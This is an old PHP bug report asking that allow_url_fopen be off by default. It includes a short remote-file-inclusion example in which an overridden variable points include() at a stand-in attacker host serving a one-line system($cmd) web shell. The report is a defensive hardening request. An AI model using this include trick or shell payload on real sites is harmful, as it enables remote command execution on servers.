ID: 21085 User updated by: [EMAIL PROTECTED] Reported By: [EMAIL PROTECTED] Status: Bogus Bug Type: Unknown/Other Function Operating System: ALL PHP Version: 4.3.0RC3 New Comment:
Agreed. However we live in a world where people aren't reading every single piece of every single package they install. Sure, anyone can shoot themselves in the foot. Sure, you can code poorly. But should this particular "feature" be on by default instead of turned on? If they turn it on, they know what they're doing. If they just drop the packages in...well, why make it easy to exploit? (Case in point - friend of mine who's not a total newbie got hacked this way.) IMHO, the default package should be as "dummy proof" as possible and able to be opened up from there. However, it's not up to me.. -Mike Previous Comments: ------------------------------------------------------------------------ [2002-12-18 15:41:09] [EMAIL PROTECTED] It's really up to the user to validate input from the outside. You can always shoot yourself in the foot if you want to. There is no valid reason to change this default. ------------------------------------------------------------------------ [2002-12-18 15:34:31] [EMAIL PROTECTED] PHP by default allows include() calls which contain URL/URI strings. register_globals=on include($somevar/file.php); // real site code exploit by overriding $somevar to http://badsite.evilcode.com where file.php is <?php system($cmd); ?> This causes the "real site" to execute the $cmd command passed in on the URL/URI string. Requesting that allow_url_fopen be set to "Off" for future releases and a documentation note made about the caveat. -Mike ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=21085&edit=1
